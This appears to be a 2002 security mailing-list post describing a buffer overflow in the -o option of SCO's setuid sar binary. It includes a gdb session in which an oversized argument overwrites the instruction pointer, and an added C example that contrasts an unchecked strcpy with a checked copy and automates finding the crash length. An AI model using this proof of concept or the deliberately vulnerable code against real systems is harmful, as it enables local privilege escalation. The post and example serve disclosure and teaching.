Vulnerability Development mailing list archives
Sar -o exploitation process info.
From: KF <dotslash () snosoft com>
Date: Thu, 09 May 2002 05:29:43 -0400
Caldera recently released an update for the suid sar binary. At one point in time someone pointed out that sar -f had an overflow (Brok Tellier or k2 probably, I can't remember). The -f overflow was fixed, but the -o option (which I have seen in private security advisories floating around) also had an overflow, but I don't think anyone ever told Caldera / SCO. I haven't gotten around to finishing up the exploit, but here are the details for those of you that are interested.
Sec focus bid: http://online.securityfocus.com/advisories/4089
Caldera fix: ftp://stage.caldera.com/pub/security/openserver/CSSA-2002-SCO.17

Exploit details:

Starting program: //home/kevin//./sar -o `perl -e 'print "A" x 2104'`
//home/kevin//./sar: Cannot create file AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.l

Program exited with code 01.

Try again with one more char.

(gdb) r -o `perl -e 'print "A" x 2105'`
Starting program: //home/kevin//./sar -o `perl -e 'print "A" x 2105'`

Program received signal SIGSEGV, Segmentation fault.
0x80021c2d in getenv ()
(gdb) bt
#0  0x80021c2d in getenv ()
#1  0x8001f2da in _tz_info ()
#2  0x8004e5c2 in tzset ()
#3  0x8004e4ba in _localtime_r ()
#4  0x8001db5f in localtime ()
#5  0x804a124 in memset ()
#6  0x41414141 in ?? ()
Cannot access memory at address 0x41414141.
(gdb) frame 6
#6  0x41414141 in ?? ()
(gdb) i r
eax            0x8001db20       -2147362016
ecx            0x54             84
edx            0x804765c        134510172
ebx            0x0              0
esp            0x80463d4        0x80463d4
ebp            0x41414141       0x41414141
esi            0x804764c        134510156
edi            0x0              0
eip            0x41414141       0x41414141
ps             0x10206          66054
cs             0x17             23
ss             0x1f             31
ds             0x1f             31
es             0x1f             31
fs             0x0              0
gs             0x0              0

-KF
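The session above finds the overflow the classic way: grow the -o argument one byte at a time until the saved frame pointer and return address come back as 0x41414141. The following is an added example, not KF's code and not SCO's sar: a stand-in for the unchecked copy of the -o argument into a fixed stack buffer, the checked form that rejects an over-long argument instead of truncating it, and a fork-based version of the "try again with one more char" probe that reports the first length at which the copy kills the process. OUTPATH_MAX, vuln_set_output, safe_set_output and probe_crash_length are assumed names and sizes for illustration; the real sar buffer is evidently larger, since 2104 bytes fit.

```c
/* Added example, not KF's code and not SCO's sar. OUTPATH_MAX is an assumed
 * buffer size; the real sar buffer holds at least 2104 bytes. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define OUTPATH_MAX 64   /* assumed size of the fixed stack buffer */

typedef int (*set_output_fn)(const char *);

/* Keeps the compiler from discarding a copy into a buffer it would otherwise
 * consider dead; the copy has to happen for the probe to mean anything. */
#define KEEP_ALIVE(p) __asm__ __volatile__("" : : "r"(p) : "memory")

/* Vulnerable form: unbounded copy of the -o argument into a fixed stack buffer.
 * noinline so that the overwritten return address is actually used on return. */
__attribute__((noinline))
int vuln_set_output(const char *arg)
{
    char path[OUTPATH_MAX];
    strcpy(path, arg);          /* no length check: a longer arg smashes the frame */
    KEEP_ALIVE(path);
    return 0;
}

/* Checked form: refuse an argument that does not fit rather than truncating it
 * silently (a silently shortened output path is its own surprise). */
__attribute__((noinline))
int safe_set_output(const char *arg)
{
    char path[OUTPATH_MAX];
    size_t n = strlen(arg);
    if (n >= sizeof path)
        return -1;              /* caller reports "name too long" and exits */
    memcpy(path, arg, n + 1);   /* n + 1 includes the terminating NUL */
    KEEP_ALIVE(path);
    return 0;
}

/* Calls fn with a string of n 'A's in this process; only sane for the checked form. */
int call_with_length(set_output_fn fn, size_t n)
{
    char *buf = malloc(n + 1);
    if (!buf) return -2;
    memset(buf, 'A', n);
    buf[n] = '\0';
    int rc = fn(buf);
    free(buf);
    return rc;
}

/* Runs fn(n 'A's) in a forked child, the in-process equivalent of re-running
 * sar under gdb with a longer argument. The child always _exit(0)s on its own,
 * so death by signal (SIGSEGV, or SIGABRT from a stack protector or fortified
 * strcpy) or a non-zero exit (a sanitizer runtime) both mean the copy went wrong.
 * Returns 1 = crashed, 0 = survived, -2 = could not fork or wait. */
static int child_crashes(set_output_fn fn, size_t n)
{
    char *buf = malloc(n + 1);
    if (!buf) return -2;
    memset(buf, 'A', n);
    buf[n] = '\0';
    pid_t pid = fork();
    if (pid < 0) { free(buf); return -2; }
    if (pid == 0) {
        fn(buf);
        _exit(0);
    }
    free(buf);
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -2;
    if (WIFSIGNALED(status)) return 1;
    return WEXITSTATUS(status) != 0;
}

/* "Try again with one more char", automated: the smallest length in [lo, hi]
 * at which the child dies. Returns -1 if every length survives, -2 on fork failure. */
int probe_crash_length(set_output_fn fn, size_t lo, size_t hi)
{
    for (size_t n = lo; n <= hi; n++) {
        int r = child_crashes(fn, n);
        if (r != 0) return r < 0 ? r : (int)n;
    }
    return -1;
}

int main(void)
{
    int v = probe_crash_length(vuln_set_output, 1, 4 * OUTPATH_MAX);
    int s = probe_crash_length(safe_set_output, 1, 4 * OUTPATH_MAX);
    printf("unchecked copy: first crashing length = %d\n", v);
    printf("checked copy:   first crashing length = %d (-1 means none)\n", s);
    return 0;
}
```

The exact length the probe reports for the unchecked copy depends on the compiler's frame layout and on whether a stack protector or fortified strcpy is in play (those turn the SIGSEGV into a SIGABRT, still a crash from the probe's point of view); the checked copy never crashes at any length. This is the same boundary the gdb session above locates by hand at 2104 versus 2105 bytes.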